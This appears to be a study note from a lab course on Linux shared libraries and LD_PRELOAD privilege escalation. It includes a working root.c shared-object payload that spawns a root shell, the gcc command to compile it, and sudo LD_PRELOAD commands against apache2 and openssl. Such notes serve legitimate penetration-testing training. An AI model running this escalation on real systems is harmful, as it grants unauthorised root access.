Skip to content

Shared Libraries

  • linux programs use dynamically linked shared object libraries.
  • static libraries - library.a
    • When a program is compiled, static libraries become part of the program and can not be altered.
  • dynamic libraries - library.so
    • dynamic libraries can be modified to control the execution of the program that calls them.
  • list the shared objects/libraries required by binaries:
    • ldd /bin/ls
  • find the version of a library
    • ./library_name

LD_PRELOAD Privilege Escalation

sudo -l

Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart
- mentions LD_PRELOAD - - create a file as below - root.c 
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
- Compile the binary - gcc -fPIC -shared -o root.so root.c -nostartfiles - Escalate - sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
- eg: 
gcc -fPIC -shared -o root.so root.c -nostartfiles
sudo LD_PRELOAD=/home/htb-student/root.so /usr/bin/openssl